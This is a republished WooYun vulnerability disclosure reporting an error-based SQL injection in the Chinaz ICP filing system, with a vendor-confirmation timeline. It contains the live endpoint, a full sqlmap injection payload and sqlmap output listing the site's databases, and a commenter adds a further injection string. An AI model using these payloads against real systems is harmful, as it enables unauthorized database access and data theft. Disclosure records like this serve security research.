站长之家备案系统SqlServer报错注入

2017年4月30日13:25:36评论304 views字数 214阅读0分42秒阅读模式

摘要

2016-03-08：细节已通知厂商并且等待厂商处理中
2016-03-09：厂商已经确认，细节仅向厂商公开
2016-03-19：细节向核心白帽子及相关领域专家公开
2016-03-29：细节向普通白帽子公开
2016-04-08：细节向实习白帽子公开
2016-04-23：细节向公众公开

漏洞概要关注数(25) 关注此漏洞

缺陷编号： WooYun-2016-182382

漏洞标题：站长之家备案系统SqlServer报错注入

漏洞作者：路人甲

提交时间： 2016-03-08 21:52

公开时间： 2016-04-23 14:34

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： sqlserver注射

0人收藏

漏洞详情

披露状态：

简要描述：

。。。

详细说明：

http://icp.chinaz.com/saveexc.ash

data: _companyname=07&_companyxz=娑�&_host=29&_provinces=娑�&_wname=88&savedata=鐎电厧缂�

_companyname

漏洞证明：

code 区域

sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: _companyname (POST)
     Type: error-based
     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
     Payload: _companyname=88') AND 7374=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7374=7374) THEN CHAR(49) 
 
 ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(118)+CHAR(113))) AND ('emmj'='emmj&_companyxz=涓&_host=19&_provinces=涓&_wname=22&savedata=瀵煎缁
 ---
 [20:57:59] [INFO] the back-end DBMS is Microsoft SQL Server
 web server operating system: Windows 2008 R2 or 7
 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
 back-end DBMS: Microsoft SQL Server 2008
 [20:57:59] [INFO] fetching database names
 [20:57:59] [WARNING] if you experience problems with non-ASCII identifier names you are advised to rerun with '--tamper=charunicodeencode'
 [20:58:16] [INFO] the SQL query used returns 131 entries
 [20:58:18] [INFO] retrieved: beian
 [20:58:22] [INFO] retrieved: DS_160304_1
 [20:58:23] [INFO] retrieved: DS_160304_2
 [20:58:24] [INFO] retrieved: DS_160304_3
 [20:58:54] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [20:59:11] [INFO] retrieved: DS_160304_4
 [20:59:12] [INFO] retrieved: DS_160305_1
 [20:59:21] [INFO] retrieved: DS_160305_2
 [20:59:22] [INFO] retrieved: DS_160305_3
 [20:59:52] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [21:00:23] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [21:00:25] [INFO] retrieved: DS_160305_4
 [21:00:33] [INFO] retrieved: DS_160308_1
 [21:01:03] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [21:01:13] [INFO] retrieved: DS_160308_2
 [21:01:43] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [21:01:45] [INFO] retrieved: DS_160308_3
 [21:02:15] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [21:02:20] [INFO] retrieved: DS_160308_4
 [21:02:28] [INFO] retrieved: hosts
 [21:02:44] [INFO] retrieved: ip
 [21:02:45] [INFO] retrieved: Keywords
 [21:03:15] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [21:03:17] [INFO] retrieved: KeyWords_123_48
 [21:03:18] [INFO] retrieved: KeyWords_123_49
 [21:03:48] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [21:03:53] [INFO] retrieved: KeyWords_123_50
 [21:03:58] [INFO] retrieved: KeyWords_123_51
 [21:04:28] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [21:04:33] [INFO] retrieved: KeyWords_123_52
 [21:04:44] [INFO] retrieved: KeyWords_123_53
 [21:05:14] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [21:05:16] [INFO] retrieved: KeyWords_123_54
 [21:05:20] [INFO] retrieved: KeyWords_123_55
 [21:05:28] [INFO] retrieved: KeyWords_123_56
 [21:05:58] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [21:06:29] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [21:06:31] [INFO] retrieved: KeyWords_123_57
 [21:07:01] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [21:07:32] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 [21:08:03] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
 
 [21:08:34] [ERROR] thread MainThread: connection timed out to the target URL or proxy
 available databases [26]:
 [*] beian
 [*] DS_160304_1
 [*] DS_160304_2
 [*] DS_160304_3
 [*] DS_160304_4
 [*] DS_160305_1
 [*] DS_160305_2
 [*] DS_160305_3
 [*] DS_160305_4
 [*] DS_160308_1
 [*] DS_160308_2
 [*] DS_160308_3
 [*] DS_160308_4
 [*] hosts
 [*] ip
 [*] Keywords
 [*] KeyWords_123_48
 [*] KeyWords_123_49
 [*] KeyWords_123_50
 [*] KeyWords_123_51
 [*] KeyWords_123_52
 [*] KeyWords_123_53
 [*] KeyWords_123_54
 [*] KeyWords_123_55
 [*] KeyWords_123_56
 [*] KeyWords_123_57

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2016-03-09 14:34

厂商回复：

感谢您的检测，这边已提交技术解决

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-08 21:55 | 动后河 ( 实习白帽子 | Rank:57 漏洞数:17 | ☭)

1

报错注入速度杠杠滴

1# 回复此人
2016-03-08 22:23 | Huc-Unis ( 普通白帽子 | Rank:1228 漏洞数:327 | 大家好！我是HUC-UNIS 我个人认为Kali下的...)

1

and 1=convert(int,select @@version)

2# 回复此人

漏洞概要 关注数(25) 关注此漏洞

缺陷编号： WooYun-2016-182382

漏洞标题： 站长之家备案系统SqlServer报错注入

相关厂商： 站长之家

漏洞作者： 路人甲